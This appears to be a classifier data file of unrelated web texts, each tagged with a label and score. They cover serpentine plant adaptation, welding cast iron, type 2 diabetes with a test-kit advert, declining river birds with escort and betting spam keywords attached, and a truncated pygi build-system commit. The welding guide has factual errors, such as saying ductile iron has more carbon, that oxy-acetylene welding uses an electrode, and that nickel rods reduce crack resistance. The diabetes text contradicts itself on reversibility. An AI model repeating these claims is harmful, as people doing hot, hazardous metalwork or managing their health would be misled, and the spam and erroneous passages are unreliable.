amplexicaulis (Brassicaceae). Using an array of genetic and genomic approaches, this model has led to advances in our understanding of adaptation to the complex and harsh serpentine environment. A fundamental question of our work is that of how organisms simultaneously adapt to multiple serious environmental challenges. In this regard, our presentation will focus on the potential adaptive roles of transcription factors, pleiotropic genes (that act in multiple biological pathways), and loss-of-function mutations (that occur at high frequency). These findings will allow us to model and predict evolutionary responses to complex environmental challenges such as those posed by climate change. Host: Deb Bell-Pedersen
__label__pos
0.96272
Welders Galore Welders Galore Ultimate Guide on How to Weld Cast Iron Welding cast iron has the reputation of being a difficult task to perform. Although it is possible, how do you weld cast iron. It is a problematic material to weld due to the high carbon content that makes it brittle and highly prone to cracking. It is doable and there are ways to make it work. Let’s look into the details, including the best welding process and the best way to weld cast iron. Is it Hard to Weld Cast Iron? Welding Cast Iron In short, this is not a straight ahead job for anyone really, but even more difficult for the beginner welders. Cast iron is an alloy of iron, 2-4% carbon, and varying amounts of other metals such as silicon, manganese, and traces of sulfur and phosphorus. The metal is generally brittle, but the type of cast iron will determine whether it’s weldable or not. After reading this article you will be at least better informed of how to go about this tricky, but not impossible, process. Types of Cast Iron Below is a brief description of the most common forms of cast iron, including their properties that determine the welding process. Gray Iron This is the most common form of cast iron used throughout the world. It is called “Gray Iron” because of it’s graphite flaky structure. While it is more ductile than White Cast Iron it is still not easy to weld and requires some special techniques to be successful. The major challenge for welders is the possibility of causing a weld metal embrittlement (process of making it brittle) when the graphite flakes enter the weld pool during the welding process. White Cast Iron White cast iron is almost unweldable thanks to carbon making up most of its form. It retains the cementite crystalline structure making white cast iron super hard and brittle. It has very high resistance to abrasion and very good compressive strength but this also makes it difficult to machine and cut. Malleable Cast Iron Malleable Cast Iron is a product of white iron after some serious heat treatment and left to cool slowly thus changing the composition of the metal. It is similar to ductile cast iron in that it is more pliable and user friendly when it comes to welding. Ductile Cast Iron Ductile cast iron, also known as ductile iron, was created in 1943. The definition of “Ductile” is pliable and not brittle. In short ductile cast iron is comprised of a higher percentage of carbon making it more flexible than the standard cast iron or gray iron, which consequently makes ductile cast iron more machinable and weldable. The Best Ways to Identify Different Cast Irons • Consulting the manufacturer, not always convenient to do this method. • Checking the color on the crack. Grey iron will show grey while white iron is brighter along the fracture. • Spark test, each type will give off different shapes and colors of sparks when grinding. This is the most popular method of identifying what type of cast iron you are dealing with. • Use a metal file to make a deep mark in the metal, may need some experience here. Steps to Weld Cast Iron Once you have identified the particular type of cast iron you are working with, there are some simple general pre-welding steps to follow. 1. Cleaning the cast iron. 2. Choosing the correct pre-heat temperature. 3. Selecting the right welding technique. Step 1. Cleaning the Welding Area As with most metals you always will want to start with a clean surface and cast iron is no different. This means things like rust and other impurities on the iron. You need to be careful that the target area is perfectly dry of all types of foreign materials including water, oils or grease. You will also need to go in with mineral spirits to remove any surface graphite before welding. Pre-heating the welding area will ensure any entrapped gases are released before the welding process begins. Step 2. Choosing the correct pre-heat temperature Learning proper heating and cooling control is a crucial skill to have under your belt before attempting to weld cast iron. It’s an important step to prevent stress cracking and minimize any residual stress build-up that may lead to cracking. When a metal is heated, it expands. If the metal is uniformly heated, no stress would be caused, but localizing the heat in a small region causes stress build-up, leading to cracking. Ductile metals can handle it by stretching from the stress, but cast iron has low ductility meaning it will crack. Pre-heating reduces the thermal gradient between the cooler surrounding area and the target area. If possible, heat up the whole casting but if not, heat up as large an area as possible. Steps in Welding Cast Iron Preheat the iron to 500-1200 degrees Fahrenheit to minimize internal stresses in the material. You can use an infrared thermometer or observe when the metal starts glowing dull red, which happens at around 900 degrees Fahrenheit. Perform the welding in a dark room so you can notice when the target area starts glowing. Allow it to just glow so then you know that you have achieved the right temperature for welding. Minimizing the heat during the actual welding process is the next best strategy when pre-heating is not possible. This may require you to stop and start a few times to prevent over heating the welding area. Welding cast iron at high temperatures is a recipe for disaster. In the past I have used different ways of pre heating cast iron before welding. You could simply use an electric heat gun or if it is a hot day just leave the job in the sun for awhile. Anything to heat the metal is better than leaving it cold. Step 3. Selecting the right Welding Technique Choosing the right welding technique comes down to preference, provided it’s suitable for the alloy being welded. You also need to choose the best filler. The most common welding techniques are stick, TIG, MIG, and oxy-acetylene welding. What is the Best way to Weld Cast Steel? Once you have cleaned the metal, the crack will be visible as a dark line. Drill a hole on either end of the crack to prevent the crack from extending. Failure to drill on both ends of the crack creates the possibility of cracking as you weld, or the part will break over time. I also recommend to create a small channel in the metal to hold the weld by using an angle grinder. Caution: do not cool the finished product by immersing into water! This will instantly create a major crack. How to Weld Cast Iron Using Different Types of Welders The kind of welder to use will be determined by the surface you are welding, and the end result expected. For instance, if you are welding a machined surface, you would use the TIG weld as a spatter from the stick, and MIG welding would cause unnecessary damage to the surface. 1/ Stick Welding Also known as metal arc welding (MMA), this method uses an electrode covered with flux, and it’s the best welding process for cast iron. The electrode required will depend on its application, color match required, and the machining to be done post welding. The main types of electrodes used are iron, nickel, or copper-based. Nickel-based electrodes are the most popular for cast iron welding as they are stronger, therefore reducing the resistance to cracking. The process involves melting an electric arc between the electrode and the welding area. Ensure the arc is directed towards the weld pool to minimize dilution that would occur when directed toward the base metal. You should also use the lowest setting to reduce heat stress and avoid damaging the metal. 2/ Oxy-acetylene Welding This process uses an electrode, but instead of an electric current, the method utilizes oxy-acetylene to generate heat. The slow heating and low amount of heat used in the process results in a large HAZ (heat affected zone), so care must be taken to avoid oxidizing the cast iron. The rod should be welded in the molten pool rather than directly by the flame. 3/ Braze Welding Brazing is commonly used for welding cast iron parts as it causes minimal impact on the base metal. The process involves using a filler with a lower melting point than cast iron. The filler, therefore, adheres to the surface of the cast iron rather than diluting into the weld pool.  For this technique to work seamlessly, you need to start off with a clean surface. You can also use flux to prevent oxidizing and promote the wetting of the surface. 4/ TIG Welding TIG welding is generally not recommended due to the highly localized heating characteristics. The skills of the welder also determine the overall outcome of this welding technique. Frequently Asked Questions about How to Weld Cast Iron How can I weld cast iron exhaust manifold? The key to welding a cast iron exhaust manifold is to go low and slow to avoid creating stress that will lead to cracking. What kind of welding rod do you use on cast iron? Nickel alloy rods are the most popular for welding cast iron. They are stronger with a low thermal coefficient which reduces welding stress. Can cast iron be welded to steel? It’s possible but not recommended due to the differences in these metals’ chemical and mechanical properties. For instance, steel has higher tensile strength than cast iron, meaning it can withstand pressure before cracking, but cast-iron cracks under stress. How do you weld cast iron without cracking it? It’s recommended to preheat the surface you want to work on or use minimal heat where preheating is not possible. ConclusionHow to Weld Cast Iron While welding cast iron is challenging, it’s possible as long you understand the properties of cast iron. The welder also needs to undertake the process with utmost care to avoid cracking. Pre and post-weld heating is a must, and high heat is a no-no during the welding process. Finally, always start with a clean surface. Scroll to Top
__label__pos
0.883809
All main services are operating. Click here for more information. your discount will be applied at checkout your 10% discount will be applied at checkout OFFER ENDS TODAY! What Is Type 2 Diabetes And Is It Preventable? Type 2 diabetes is mainly caused by a poor lifestyle such as a bad diet and lack of exercise. So how can you prevent or even reverse it? Is prediabetes preventable? Type 2 diabetes is becoming increasingly common, mainly because of an increase in sedentary lifestyles and the prevalence of obesity. So, how can you prevent it and is prediabetes diagnosis reversible? What Is Type 2 Diabetes? Type 2 diabetes is when the body is unable to control the level of glucose in the blood resulting in high blood sugar levels. What Causes Type 2 Diabetes? Type 2 diabetes is caused when the body is unable to make enough of the hormone known as insulin, or the insulin doesn't work properly so blood sugar levels keep rising. Insulin is made by the pancreas and it releases the hormone insulin in response to rising blood glucose levels. When we eat, the glucose in our food is absorbed into the bloodstream. The release of insulin allows the circulating glucose to be taken up by our cells, that use it for energy. As a result, the release of insulin slows down and the blood glucose levels return to normal. In people with type 2 diabetes, the pancreas can become worn out as a result of insulin not working properly or less insulin being produced by the body.  This leads to high higher blood sugar levels.  This puts some people with type 2 diabetes at risk of hyperglycaemia if the condition is not managed. According to Diabetes UK approximately 90% of people in the UK with diabetes have type 2 which is a serious condition, lifelong condition.  However, it is preventable. Type 2 diabetes can be caused by: • The pancreatic beta cells having trouble producing insulin. So, they may produce some, but not enough to meet the body’s needs; or • The insulin doesn’t work as expected. In this case, insulin receptors are insensitive and don’t respond to the insulin in the bloodstream, so blood glucose levels remain high. Complications Of Type 2 Diabetes Prolonged increases in blood glucose levels are harmful to the body, particularly the blood vessels. When the blood vessels become damaged, blood is unable to travel effectively around the body, so vital nutrients and oxygen may not reach these parts. Consequently, nerves can also become damaged and when both blood vessels and nerves are damaged in one area of the body, complications can arise. Complications of type 2 diabetes include: • Eye problems • Heart attacks • Kidney problems • Nerve damage • Foot problems What's The Difference Between Type 1 and Type 2 Diabetes? Type 1 diabetes is when your body attacks the cells in your pancreas preventing it from producing insulin which controls your blood sugar levels.  Whereas type 2 diabetes is when the body is unable to make enough insulin.  It is not known what causes type 1 diabetes but symptoms develop much more quickly than type 2 diabetes. Type 2 Diabetes Risk Factors Lifestyle plays a part in type 2 diabetes and being overweight is considered a risk factor, along with age, ethnicity and high blood pressure.  Having a parent or sibling with diabetes also increases your risk of developing type 2 diabetes.  Key risk factors are: • Age - those 40+ years of age (25+ years of age for south Asian people) • Weight gain and obesity, especially around the middle • Being of Asian, African-Caribbean or black African ethnicity • Having a close family member with diabetes • High cholesterol and triglycerides • Hypertension (high blood pressure) “Being overweight is the most significant risk factor for developing type 2 diabetes and is associated with 80% to 85% of risk.”, Emma Elvin, Senior Clinical Advisor at Diabetes UK. Type 2 Diabetes Symptoms Type 2 diabetes symptoms can be tricky to identify as they develop slowly over time, however, symptoms include: • Increased thirst • Tiredness/fatigue • Unexplained weight loss  • Needing to urinate more frequently, particularly at night • Itchy penis or vagina, or getting thrush more regularly • Wounds and cuts taking longer to heal • Blurred vision Is Type 2 Diabetes Reversible? Type 2 diabetes is a lifelong condition and needs to be managed through diet, exercise and medication.  However, according to Diabetes UK, type 2 diabetes can be put into remission by losing weight and following a low-calorie diet as prescribed by your healthcare professional.  Surgery is also an option for some people to put type 2 diabetes into remission.   What Is Prediabetes? Prediabetes isn't a condition but a term used to describe high blood glucose levels.  Levels have to be higher than the normal range but not yet high enough to diagnose type 2 diabetes.  It is estimated that one in three adults in England have prediabetes. “Prediabetes is a term that some healthcare professionals use to describe when your blood glucose levels are higher than normal, but not high enough for you to be diagnosed with Type 2 diabetes. Prediabetes isn’t a clinical term that is recognised by the World Health Organisation, but some healthcare professionals use it to help them explain that someone is at increased risk of Type 2 diabetes”, Emma Elvin, Senior Clinical Advisor at Diabetes UK. The best way to identify prediabetes is with a blood test that measures HbA1c.  Unlike blood glucose tests which measures blood sugar levels at the time of the test, HbA1c blood tests provide an average measurement of blood sugar levels over the last 2-3 months.  This means it's a much better way to identify prediabetes and to monitor type 2 diabetes. As prediabetes predisposes individuals to type 2 diabetes and is a critical stage in its development, it's good to understand if it can be reversed. Is Prediabetes Reversible? Yes. Type 2 diabetes itself is a preventable disease. In many cases, it develops because of a poor lifestyle. Therefore, as prediabetes is an indicator of impending type 2 diabetes, it can be reversed by making lifestyle changes. Lifestyle Changes To Prevent Type 2 Diabetes Making some simple changes to your lifestyle can reduce the risk of developing type 2 diabetes significantly as well as reversing prediabetes and also putting type 2 diabetes into remission. Therefore, the following lifestyle changes can help to reduce your overall risk: • Weight loss • Reducing alcohol intake • Quitting smoking • Exercise How Your Diet Can Help Prevent Type 2 Diabetes Diet is a major risk factor for the development of type 2 diabetes. Convenience foods such as ready meals, fast food and fizzy drinks are thought to be major contributors because they have high sugar, salt and saturated fat contents. However, you can reduce your chances of developing type 2 diabetes by making changes to your diet. Diets which don’t cause your body to produce lots of insulin are particularly beneficial: • Reduce your carbohydrate intake or choose healthier options: • Wholegrain bread, pasta • Oats • Brown rice • Incorporate as many fruits and vegetables as you can into your diet • Swap snacks like cakes, sweets and crisps for food such as fruit, nuts and seeds • Cut out sugary drinks • Aim for 2 portions of oily fish per week • Mackerel • Salmon • Tuna • Sardines • Herring • Avoid processed foods • Takeaways • Fast food • Processed ready meals Alcohol contains a lot of calories and so it increases your chance of obesity which is a risk factor for type 2 diabetes. Plus, alcohol is responsible for reducing the body’s sensitivity to insulin, a cause of type 2 diabetes. Therefore, although you shouldn’t need to give up drinking alcohol entirely, you should limit your intake. Current advice is no one should drink more than 14 units of alcohol per week. Exercise And Preventing Type 2 Diabetes A great way to naturally lower your blood sugar levels is exercise. Exercise reduces the amount of glucose in the blood because muscles can use it as an energy source, even if there is little or no insulin present. Aerobic exercise at a moderate to vigorous intensity has long been recommended to prevent the development of conditions such as obesity and type 2 diabetes. The body’s insulin sensitivity can be improved after just one week of aerobic exercise. Adults should aim to complete at least 150 minutes of moderate aerobic activity per week. So, you could perform 30 minutes every day for five days and rest for two, it is important you have rest days to let your body recover. Aerobic activities include: • Cycling • Brisk walking • Swimming • Gardening You should combine this with strength exercise on 2 or more days per week, too. Strength exercises should work your major muscles and you may choose weights or your own body weight using exercises like press ups, pull ups or sit ups. As you progress you may prefer to incorporate some vigorous aerobic exercise into your programme, 75 minutes per week is advisable instead of 150 minutes of aerobic activity. But this should also be combined with strength training. Vigorous intensity aerobic activities include: • Running • Swimming laps • Playing singles tennis • Hiking Additional benefits of exercise are: • Increases good cholesterol and reduces bad cholesterol • Better mental health • Lower blood pressure • Better weight control • Strong Bones • Better sleep • Increased energy levels • Stronger muscles If you have type 2 diabetes or you think you may be at risk, you should speak to your doctor before starting any new exercise. Making changes to your diet and increasing your physical activity levels can help to reduce the risk of developing type 2 diabetes, reverse prediabetes and even put type 2 diabetes into remission. Summary An HbA1c blood test is the best way to check for type 2 diabetes. If blood glucose levels are high to indicate prediabetes then lifestyle changes can be made to prevent it developing into type 2 diabetes. In the UK, up to 10% of people diagnosed as prediabetic go on to develop diabetes.  Type 2 diabetes can be reversed through diet and exercise, as well as surgery.  Making simple yet effective changes to your lifestyle can dramatically reduce the chance of developing the type 2 diabetes and can even reverse prediabetes. The two biggest factors are diet and exercise. Return to Blog>> HbA1c (pre-diabetes) Our HbA1c blood test measures average blood glucose levels over a 10-12 week period. Gain accurate data on the amount of sugar in your diet and reduce your risk of type 2 diabetes. HbA1c (pre-diabetes) £39 1 Biomarkers Included Check your body's average average blood glucose level. References 1. Diabetes Digital Media Ltd. (2019). Prediabetes (Borderline Diabetes). Available at: https://www.diabetes.co.uk/pre-diabetes.html 2. National Health Service. (2014). One in Three Adults in England ‘Has Prediabetes’. Available at: https://www.nhs.uk/news/diabetes/one-in-three-adults-in-england-has-prediabetes/ 3. Rynders, C, A et al. (2014). Effects of Exercise Intensity on Postprandial Improvement in Glucose Disposal and Insulin Sensitivity in Prediabetic Adults. The Journal of Clinical Endocrinology and Metabolism: 99(1), pp 220-228. 4. Tuso, P. (2014). Prediabetes and Lifestyle Modification: Time to Prevent a Preventable Disease. Perm J: 18(3), pp 88-93. 5. https://www.diabetes.org.uk/type-2-diabetes SHARE THIS ARTICLE​ Share on facebook Share on twitter Share on linkedin Service Status Kit Dispatch Kits ordered before 2pm from Monday to Friday continue to be dispatched same day via First Class Royal Mail. After 2pm your kit will be dispatched the next working day. Orders placed on the weekend will be despatched Monday. Postal Service There may be some delays in parts of the UK while the Royal Mail catches up with their Christmas backlog. Click here for updates on the Royal Mail service. Lab Analysis Our labs are operating as normal. Doctor/nurse reviews Our doctors and nurses are currently working remotely and continue to review results. Home phlebotomy appointments Our home phlebotomy service is running but please be aware, if you or anyone in your household have experienced symptoms of COVID-19 within the last 14 days, due to the current government guidelines, we are unable to arrange an appointment at this time. Due to a high demand for nurses, along with current covid restrictions around the UK, there may be a delay in providing an appointment. Customer service Our customer service team are currently working from home, available to answer any questions via email. Results dashboard You can continue to access your results as normal either through your browser or via our iOS or Android app. CORPORATE ENQUIRY If you are an employer and would like to order multiple tests for your employees, please complete the form below.
__label__pos
0.872791
ankara escort kusadasi escort giresun escort kirklareli escort bahis siteleri antalya escort antalya escort Photo © Ian Coristine/1000IslandsPhotoArt.com  You are here:  Back Issues      Archive Search    River Birds: The Bad, Part III So far my articles have concentrated on the winners with increasing populations over the last four decades. Now I will mention the losers. Even though birds are better understood and monitored than most other living organisms, our knowledge of many species remains crude and imprecise. Only when species are rapidly increasing or severely declining can we detect significant population fluctuations. For species in decline such understanding may come too late to stop local or regional extinctions of a permanent or temporary nature. For the following birds a clear decline has occurred in our region during the last forty years.Female Zonnenberg Black Tern. This diminutive "marsh tern" was well distributed here and there along the River as a breeder in the late 1970s. Since then it has virtually disappeared from the area remaining only at two sites near the River. This local pattern mirrors a regional decline in the northeastern quarter of the continent. Our remaining largest population is at Perch River Wildlife Management area with its controlled water levels. It is likely the hydrological disruption of previous water level management on the River has contributed to this species decline. Hopefully, the adoption of Plan 2014 will gradually make our marshes more hospitable to this lovely bird.Male bobolink zonnenberg The Loggerhead Shrike was once a fairly common bird in Northern New York. This species was already in decline, by the 1970s and was virtually extinct in New York, by a decade later. We haven't a clue why, as its habitat seems intact. This decline has occurred throughout most of the northern parts of these species range, where they are migrants. The late Dr. F. G. Scheider of Syracuse, suggested our birds were vulnerable to chemical control of fire ants, on their winter range. This seems as good an explanation as any. The province of Ontario has begun a restoration effort for this species, by releasing captive reared birds. Perhaps some of these will expand to our area, or a similar effort that may be undertaken in New York, will help restore this interesting predatory songbird. Zenda bobolinks The group of birds that has declined the most in our region, during the last four decades, are those that utilize grasslands. Intensive agriculture is the primary culprit, by converting grass to row crops and by doing too frequent mowing of remaining grass areas. Thus, species breeding in these areas are being hammered at a level, where reproductive success is often impossible. The populations of species, such as the Eastern Meadowlark, Bobolink and Savannah Sparrow, have been reduced. While these birds still remain fairly common locally, the trend is not a positive one. Other species, including Northern Harrier, take months to get their young to fledging. The constant mowing has rendered, once suitable nesting areas, unusable. The Upland Sandpiper (formerly called Upland Plover) and Henslow's Sparrow, once fairly Common in our region, are virtually gone. The North Country Bird Club has existed for seven decades and their newsletter is called the Upland Plover. This indicates how common this species once was, as bird club newsletter mascots are usually locally common birds of interest. The current editor of that publication tells me he has never seen the species in the field in NNY. Heron zonnenberg Grassland birds, in general now, require human conservation action, such as that being conducted by the Thousand Islands Land Trust. This avian guild is one of the fastest declining bird groups in many parts of the world. Grassland birds are in severe trouble, for many reasons, possibly including climate change. They will require concerted conservation management efforts, such as those that improved Bald Eagle and Common Tern populations in our region. Their future locally depends on us. One of the poster children for bird decline in North America, is the Golden-winged Warbler. A candidate for the federal endangered species, this species was not common in our region, four decades ago. The gradual shifting north of this beautiful bird is a result of competitive pressure, from the closely related and genetically dominant, Blue-winged Warbler. These two species were once geographically isolated, but have been brought together by landscape level changes,due to human activity. Scientists are scrambling madly, to understand breeding habitat factors that may isolate these two species. One of the two largest Golden-winged Warbler populations, in the Northeast US, now exists in the nearby Indian River Lakes Region. Management efforts are underway, to understand how best to protect and manage this species in our region. Hopefully success will occur, as there is a limit to how far north this species can retreat, before it runs out of suitable habitat. IN flight Zonnenberg Several other birds that were more common on the River, forty years ago, are experiencing local and regional declines, from known and unknown factors. Great Blue Heron sightings, in the Thousand Islands region, have decreased in this century. This is in large part due to the abandonment of the massive Ironsides Island colony. Cyclic colony development and abandonment is normal for this species, due to nest tree die-off and other factors. Many of the herons from this colony seemed to have formed smaller associations in other areas. It's unclear if this apparent decline is real, or simply an artifact of smaller more dispersed colonies. This species seems to be doing well in most parts of New York State. For human residents with bird feeders, the decline of one species of winter visitor is striking. The Evening Grosbeak used to descend in hordes on any available sunflower seed, prior to the mid-1990s. This species was an incredibly common winter visitor, for the first three decades of my birding career. Then suddenly, over just a few short years, the hordes came no more. By this century, the sighting of pairs and small groups became an event. Why? Well it appears that over the last few years, science has given us an answer to the enigma. While they are with us, these big bold finches are vegetarians, inhaling sunflower seeds, like vacuum cleaners. Fishing Bue t turns out that while on their Canadian Forest breeding grounds, a primary food source is the spruce budworm, whose tiny caterpillars infest black spruce. When infestations develop,populations surge along, with those of several Warbler species, including Cape May and Bay-breasted. It seems that there have been fewer cyclic outbreaks of the budworm, in the last two decades and those that have occurred have often been suppressed, by commercial forestry interests. This species population seems to be exhibiting evidence of a slight rebound, but whether the hordes that graced my youth will return in my lifetime is unknown. Bird and wildlife populations are dynamic and fluctuations with change are normal. Unfortunately, given the intense pressure humans are placing on our planet, wildlife is being forced to adapt much faster than evolution usually requires. For those that do, they shall remain our fellow travelers in life for a long time. As the dominant species on this planet, we must assure that the losers, in the brave new world of the Anthropocene, are part of the future of the Thousand Islands. By Gerry Smith Gerald A. "Gerry" Smith, is an ornithologist who can often be found leading fellow bird enthusiasts, on guided Thousand Islands Trust (TILT) tours, throughout the year.  He is a graduate of the biology program at SUNY Oswego, is one of the founding members of Derby Hill Bird Observatory, along Lake Ontario. He was the first staff ornithologist at Derby Hill, for the Onondaga Audubon Society. Gerry was President of the Onondaga Audubon Society and in 2010, he published the popular guide book, "Birding the Great Lakes Seaway Trail.” Posted in: Nature Please feel free to leave comments about this article using the form below. Comments are moderated and we do not accept comments that contain links. As per our privacy policy, your email address will not be shared and is inaccessible even to us. For general comments, please email the editor. Comments Peter Glazier Comment by: Peter Glazier Left at: 7:55 PM Wednesday, March 15, 2017 I am surprised in these columns that there was no mention of the elephant in th room, so to speak, of the cormorant. This bird in the last 10 years has probably done more harm to the environment of the Thousand Isalnds, above and below the water, than any other species! Still waiting for the Ontario government to recognize the damage. Post Comment Name (required) Email (required)
__label__pos
0.656201
Commit b24fd963 authored by Simon van der Linden's avatar Simon van der Linden Browse files Initial import parents .libs/ .deps/ /COPYING Makefile Makefile.in /aclocal.m4 /autom4te.cache/ /config.guess /config.h /config.h.in /config.log /config.status /config.sub /configure /depcomp /install-sh /libtool /ltmain.sh /m4/ /missing /py-compile /pygi-*.tar.gz /stamp-h1 *.o *.lo *.la *.so *.pyc *.gir *.typelib .*.swp ACLOCAL_AMFLAGS = -I m4 AM_CFLAGS = \ -Wall \ -g SUBDIRS = \ gi \ tests #!/bin/sh # Run this to generate all the initial makefiles, etc. srcdir=`dirname $0` test -z "$srcdir" && srcdir=. DIE=0 if [ -n "$GNOME2_DIR" ]; then ACLOCAL_FLAGS="-I $GNOME2_DIR/share/aclocal $ACLOCAL_FLAGS" LD_LIBRARY_PATH="$GNOME2_DIR/lib:$LD_LIBRARY_PATH" PATH="$GNOME2_DIR/bin:$PATH" export PATH export LD_LIBRARY_PATH fi (test -f $srcdir/configure.ac) || { echo -n "**Error**: Directory "\`$srcdir\'" does not look like the" echo " top-level package directory" exit 1 } (autoconf --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`autoconf' installed." echo "Download the appropriate package for your distribution," echo "or get the source tarball at ftp://ftp.gnu.org/pub/gnu/" DIE=1 } (grep "^IT_PROG_INTLTOOL" $srcdir/configure.ac >/dev/null) && { (intltoolize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`intltool' installed." echo "You can get it from:" echo " ftp://ftp.gnome.org/pub/GNOME/" DIE=1 } } (grep "^AM_PROG_XML_I18N_TOOLS" $srcdir/configure.ac >/dev/null) && { (xml-i18n-toolize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`xml-i18n-toolize' installed." echo "You can get it from:" echo " ftp://ftp.gnome.org/pub/GNOME/" DIE=1 } } (grep "^AM_PROG_LIBTOOL" $srcdir/configure.ac >/dev/null) && { (libtool --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`libtool' installed." echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" DIE=1 } } (grep "^AM_GLIB_GNU_GETTEXT" $srcdir/configure.ac >/dev/null) && { (grep "sed.*POTFILES" $srcdir/configure.ac) > /dev/null || \ (glib-gettextize --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`glib' installed." echo "You can get it from: ftp://ftp.gtk.org/pub/gtk" DIE=1 } } (automake --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: You must have \`automake' installed." echo "You can get it from: ftp://ftp.gnu.org/pub/gnu/" DIE=1 NO_AUTOMAKE=yes } # if no automake, don't bother testing for aclocal test -n "$NO_AUTOMAKE" || (aclocal --version) < /dev/null > /dev/null 2>&1 || { echo echo "**Error**: Missing \`aclocal'. The version of \`automake'" echo "installed doesn't appear recent enough." echo "You can get automake from ftp://ftp.gnu.org/pub/gnu/" DIE=1 } if test "$DIE" -eq 1; then exit 1 fi if test -z "$*"; then echo "**Warning**: I am going to run \`configure' with no arguments." echo "If you wish to pass any to it, please specify them on the" echo \`$0\'" command line." echo fi case $CC in xlc ) am_opt=--include-deps;; esac for coin in `find $srcdir -path $srcdir/CVS -prune -o -name configure.ac -print` do dr=`dirname $coin` if test -f $dr/NO-AUTO-GEN; then echo skipping $dr -- flagged as no auto-gen else echo processing $dr ( cd $dr aclocalinclude="$ACLOCAL_FLAGS" if grep "^AM_GLIB_GNU_GETTEXT" configure.ac >/dev/null; then echo "Creating $dr/aclocal.m4 ..." test -r $dr/aclocal.m4 || touch $dr/aclocal.m4 echo "Running glib-gettextize... Ignore non-fatal messages." echo "no" | glib-gettextize --force --copy echo "Making $dr/aclocal.m4 writable ..." test -r $dr/aclocal.m4 && chmod u+w $dr/aclocal.m4 fi if grep "^IT_PROG_INTLTOOL" configure.ac >/dev/null; then echo "Running intltoolize..." intltoolize --copy --force --automake fi if grep "^AM_PROG_XML_I18N_TOOLS" configure.ac >/dev/null; then echo "Running xml-i18n-toolize..." xml-i18n-toolize --copy --force --automake fi if grep "^AM_PROG_LIBTOOL" configure.ac >/dev/null; then if test -z "$NO_LIBTOOLIZE" ; then echo "Running libtoolize..." libtoolize --force --copy fi fi echo "Running aclocal $aclocalinclude ..." aclocal $aclocalinclude if grep "^A[CM]_CONFIG_HEADER" configure.ac >/dev/null; then echo "Running autoheader..." autoheader fi echo "Running automake --foreign $am_opt ..." automake --add-missing --foreign $am_opt echo "Running autoconf ..." autoconf ) fi done conf_flags="--enable-maintainer-mode" if test x$NOCONFIGURE = x; then echo Running $srcdir/configure $conf_flags "$@" ... $srcdir/configure $conf_flags "$@" \ && echo Now type \`make\' to compile. || exit 1 else echo Skipping configure process. fi AC_INIT(pygi, 0.1) AM_INIT_AUTOMAKE(foreign) AC_CONFIG_HEADERS(config.h) AC_CONFIG_MACRO_DIR(m4) m4_ifdef([AM_SILENT_RULES], [AM_SILENT_RULES]) AM_MAINTAINER_MODE AC_ISC_POSIX AC_PROG_CC AM_PROG_CC_STDC AC_HEADER_STDC AM_PROG_LIBTOOL # Python AM_PATH_PYTHON(2.5.2) AC_PATH_TOOL(PYTHON_CONFIG, "/python${PYTHON_VERSION}-config") if test -z "$PYTHON_CONFIG"; then AC_MSG_ERROR(Python development tools not found) fi PYTHON_INCLUDES=`$PYTHON_CONFIG --includes` AC_SUBST(PYTHON_INCLUDES) save_CPPFLAGS="${CPPFLAGS}" CPPFLAGS+="${PYTHON_INCLUDES}" AC_CHECK_HEADER(Python.h, , AC_MSG_ERROR(Python headers not found)) CPPFLAGS="${save_CPPFLAGS}" # GNOME PKG_CHECK_MODULES(GNOME, glib-2.0 >= 2.22 gobject-introspection-1.0 >= 0.6.4 pygobject-2.0 >= 2.20 ) INTROSPECTION_SCANNER=`$PKG_CONFIG --variable=g_ir_scanner gobject-introspection-1.0` INTROSPECTION_COMPILER=`$PKG_CONFIG --variable=g_ir_compiler gobject-introspection-1.0` AC_SUBST(INTROSPECTION_SCANNER) AC_SUBST(INTROSPECTION_COMPILER) AC_OUTPUT( Makefile gi/Makefile gi/repository/Makefile gi/overrides/Makefile tests/Makefile ) PLATFORM_VERSION = 2.0 pkgincludedir = $(includedir)/pygtk-$(PLATFORM_VERSION) pkgpyexecdir = $(pyexecdir)/gtk-2.0 SUBDIRS = \ repository \ overrides pygidir = $(pkgpyexecdir)/gi pygi_PYTHON = \ types.py \ module.py \ importer.py \ __init__.py _gi_la_CFLAGS = \ $(PYTHON_INCLUDES) \ $(GNOME_CFLAGS) _gi_la_LDFLAGS = \ -module \ -avoid-version \ -export-symbols-regex init_gi _gi_la_LIBADD = \ $(GNOME_LIBS) _gi_la_SOURCES = \ pygi-repository.c \ pygi-repository.h \ pygi-info.c \ pygi-info.h \ pygi-struct.c \ pygi-struct.h \ pygi-argument.c \ pygi-argument.h \ pygi-type.c \ pygi-type.h \ pygi.h \ pygi-private.h \ pygobject-external.h \ gimodule.c pygi_LTLIBRARIES = _gi.la .la.so: $(LN_S) .libs/$@ $@ || true all: $(pygi_LTLIBRARIES:.la=.so) clean-local: rm -f $(pygi_LTLIBRARIES:.la=.so) # -*- Mode: Python; py-indent-offset: 4 -*- # vim: tabstop=4 shiftwidth=4 expandtab # # Copyright (C) 2005-2009 Johan Dahlin <[email protected]> # # This library is free software; you can redistribute it and/or # modify it under the terms of the GNU Lesser General Public # License as published by the Free Software Foundation; either # version 2.1 of the License, or (at your option) any later version. # # This library is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU # Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public # License along with this library; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 # USA from __future__ import absolute_import from ._gi import _API /* -*- Mode: C; c-basic-offset: 4 -*- * vim: tabstop=4 shiftwidth=4 expandtab * * Copyright (C) 2005-2009 Johan Dahlin <[email protected]> * * gimodule.c: wrapper for the gobject-introspection library. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, write to the Free Software * Foundation, Inc., 51 Franklin St, 